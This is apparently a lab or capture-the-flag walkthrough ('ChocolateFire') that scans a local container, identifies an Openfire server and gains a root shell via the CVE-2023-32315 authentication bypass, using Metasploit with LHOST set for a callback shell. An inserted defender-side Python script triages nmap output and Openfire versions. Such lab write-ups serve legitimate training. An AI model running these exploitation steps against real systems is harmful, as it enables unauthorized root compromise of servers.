ChocolateFire
1. Network Enumeration
Performing a Full Port Scan
export TARGET_IP=172.17.0.3
sudo nmap -p- $TARGET_IP
Scan Results:
The scan identifies multiple open ports, including SSH (22/tcp) and several XMPP-related services:
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
5222/tcp open xmpp-client
5223/tcp open hpvirtgrp
5262/tcp open unknown
5263/tcp open unknown
5269/tcp open xmpp-server
5270/tcp open xmp
5275/tcp open unknown
5276/tcp open unknown
7070/tcp open realserver
7777/tcp open cbt
9090/tcp open zeus-admin
2. Exploitation: Openfire Authentication Bypass (CVE-2023-32315)
The XMPP ports (5222, 5269) together with 9090, the default port of the Openfire admin console, indicate an Openfire server, so we check it for known vulnerabilities. One critical vulnerability is CVE-2023-32315, which allows authentication bypass of the admin console and, from there, remote code execution (RCE).
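As an added defender-side example (not part of the original writeup): a small Python triage script that parses an nmap port table like the one above, flags the Openfire fingerprint when the admin console is reachable from the network, and checks a reported Openfire version against the fix versions for CVE-2023-32315 (4.6.8 and 4.7.5, taken as an assumption from the vendor advisory; the sample scan text and all function names are constructed here).

```python
"""Defender-side triage for the Openfire footprint seen in the scan above.

Constructed example: parses nmap's normal-output port table, decides whether
the host looks like an Openfire server (XMPP client/server ports plus the
default admin console on 9090/9091) and flags an exposed admin console.
The version check uses the fix versions 4.6.8 / 4.7.5 for CVE-2023-32315
(assumed from the vendor advisory; verify before relying on it).
"""
import re
from typing import Dict, List

# Constructed sample: a subset of the port table from the nmap scan above.
SAMPLE_SCAN = """\
PORT STATE SERVICE
22/tcp open ssh
5222/tcp open xmpp-client
5269/tcp open xmpp-server
7070/tcp open realserver
9090/tcp open zeus-admin
"""

ADMIN_CONSOLE_PORTS = {9090, 9091}   # Openfire admin console (HTTP / HTTPS)
XMPP_PORTS = {5222, 5269}            # client-to-server and server-to-server
FIXED_VERSIONS = {(4, 6): (4, 6, 8), (4, 7): (4, 7, 5)}  # assumed from advisory

PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+(\S+)", re.M)


def parse_open_ports(nmap_text: str) -> Dict[int, str]:
    """Return {port: nmap service guess} for every open TCP port in the table."""
    return {int(p): svc for p, svc in PORT_RE.findall(nmap_text)}


def triage(nmap_text: str) -> List[str]:
    """Return findings a defender should act on for an Openfire-looking host."""
    ports = parse_open_ports(nmap_text)
    findings: List[str] = []
    if XMPP_PORTS <= ports.keys():
        findings.append("xmpp-service-present")
        exposed = sorted(ADMIN_CONSOLE_PORTS & ports.keys())
        if exposed:  # admin console should be bound to localhost or firewalled
            findings.append("admin-console-exposed:" + ",".join(map(str, exposed)))
    return findings


def is_patched(version: str) -> bool:
    """True if an Openfire version is at or above the fix for CVE-2023-32315."""
    parts = [int(x) for x in re.findall(r"\d+", version)[:3]]
    v = tuple(parts + [0] * (3 - len(parts)))
    fixed = FIXED_VERSIONS.get(v[:2])
    if fixed is None:
        return v >= (4, 8, 0)  # 4.8.0+ was released after the fix; older branches lack it
    return v >= fixed
```

Run `triage(SAMPLE_SCAN)` to see the two findings for the scanned host; an empty list means no Openfire fingerprint was matched.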
Using Metasploit to Exploit the Vulnerability
Metasploit contains an exploit module for this vulnerability. We proceed as follows:
- Launch Metasploit:
msfconsole -q
- Search for Openfire exploits:
msf6 > search openfire
- Select the relevant exploit module:
msf6 > use exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315
- Configure the exploit options:
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > show options
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set RHOSTS 172.17.0.3
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > set LHOST 172.17.0.1
- Execute the exploit:
msf6 exploit(multi/http/openfire_auth_bypass_rce_cve_2023_32315) > run
Upon successful exploitation, we confirm that the resulting shell runs as root:
id
uid=0(root) gid=0(root) groups=0(root)